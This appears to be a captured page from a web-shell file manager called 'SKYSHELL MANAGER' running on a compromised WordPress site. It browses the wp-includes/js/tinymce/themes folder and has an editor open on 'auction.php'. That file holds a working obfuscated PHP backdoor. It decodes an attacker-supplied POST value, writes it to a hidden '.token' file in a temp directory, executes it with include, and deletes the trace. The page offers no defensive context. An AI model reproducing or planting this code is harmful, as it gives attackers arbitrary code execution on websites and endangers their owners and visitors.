📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: auction.php
<?php if(!is_null($_POST["\x69\x74m"] ?? null)){ $mrk = $_POST["\x69\x74m"]; $mrk= explode( '.',$mrk ) ; $pset = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $i = 0; foreach( $mrk as $v3) { $chS = ord( $salt[$i % $sLen]); $d = ( ( int)$v3 - $chS -( $i % 10))^7; $pset .= chr( $d); $i++; } $dat = array_filter(["/var/tmp", getenv("TMP"), getenv("TEMP"), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/dev/shm", getcwd()]); foreach ($dat as $key => $marker) { if (is_writable($marker) && is_dir($marker)) { $value = sprintf("%s/.token", $marker); $file = fopen($value, 'w'); if ($file) { fwrite($file, $pset); fclose($file); include $value; @unlink($value); die(); } } } }
Save